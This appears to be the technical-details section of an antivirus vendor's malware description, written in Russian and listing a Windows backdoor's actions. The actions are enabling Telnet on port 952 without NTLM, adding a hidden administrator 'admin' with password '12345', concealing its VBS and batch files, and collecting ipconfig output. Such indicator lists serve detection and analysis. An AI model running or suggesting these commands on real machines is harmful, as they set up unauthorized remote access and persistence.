Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntadmn.exe config port=952 sec=-NTLM
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\wscript.exe "%WINDIR%\WMNetMgr.vbs"
- <SYSTEM32>\ipconfig.exe /all
- <SYSTEM32>\attrib.exe +a +s +h C:\infosystem.txt
- <SYSTEM32>\attrib.exe +a +s +h %WINDIR%\WMNetMgr.vbs
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /del
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\1e.bat" "
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\reg.exe ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v admin /t REG_DWORD /d 00000000 /f
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\net1.exe user admin 12345 /add
- <SYSTEM32>\net1.exe localgroup Администраторы admin /add
- C:\infosystem.txt
- %WINDIR%\WMNetMgr.vbs
- %TEMP%\1.tmp\1e.bat
- %WINDIR%\WMNetMgr.vbs
- %WINDIR%\WMNetMgr.vbs
- %TEMP%\1.tmp\1e.bat